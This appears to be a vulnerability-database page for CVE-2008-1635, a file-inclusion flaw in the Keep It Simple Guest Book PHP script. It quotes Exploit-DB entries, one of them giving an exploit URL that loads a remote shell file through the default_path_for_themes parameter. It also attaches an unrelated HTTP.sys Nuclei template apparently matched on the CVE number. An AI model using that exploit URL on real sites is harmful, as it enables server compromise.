CVE-2008-1635
published 2008-04-02CVE-2008-1635: Directory traversal vulnerability in view_private.php in Keep It Simple Guest Book (KISGB) 5.0.0 and earlier allows remote attackers to include and execute…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.99%
85.6th percentile
Directory traversal vulnerability in view_private.php in Keep It Simple Guest Book (KISGB) 5.0.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the tmp_theme parameter. NOTE: 5.1.1 is also reportedly affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| raven_php_scripts | keep_it_simple_guest_book | <= 5.1.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
KISGB (tmp_theme) 5.1.1 - Local File Inclusion
exploitdb·2008-03-30
CVE-2008-1635 KISGB (tmp_theme) 5.1.1 - Local File Inclusion
KISGB (tmp_theme) 5.1.1 - Local File Inclusion
---
[~] KISGB (Keep It Simple Guest Book) : Local FiLe Include's (tmp_theme)
[~]
[~] Version : All Versions
[~]
[~] Download : http://sourceforge.net/project/showfiles.php?group_id=38585
[~] ----------------------------------------------------------
[~] Exploit coded and founded by Cr@zy_King
[~]
[~] Date: 30.03.2008
[~]
[~]
[~] [email protected]
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Digital-AngeLs Bug Researchers Yakinda OnLine :) Loading.
[~]
[~] [Peace Crew] Kerem125 - Alemin_Krali - m0sted - UyussMan
[~]
[~] Eno7 | Crackers_Child | Ghost61 | str0ke | [Hx] | [03xTr] | The_Bekir
[~]----------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http:
Exploit-DB
KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion
exploitdb·2006-12-22
CVE-2008-1635 KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion
KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion
---
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
+Author : mdx
*
+Files : *
+authenticate.php? *
+code : *
+ *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+ *
+ Exploit : *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt? +
+++++++++
Nuclei
Microsoft Windows 'HTTP.sys' - Remote Code Execution
nuclei·CVSS 9.8
CVE-2015-1635 [CRITICAL] Microsoft Windows 'HTTP.sys' - Remote Code Execution
Microsoft Windows 'HTTP.sys' - Remote Code Execution
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Template:
id: CVE-2015-1635
info:
name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
author: Phillipo
severity: critical
description: |
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
impact: |
Attackers can execute arbitrary code remotely on Windows servers running vulnerab
No writeups or analysis indexed.
2008-04-02
Published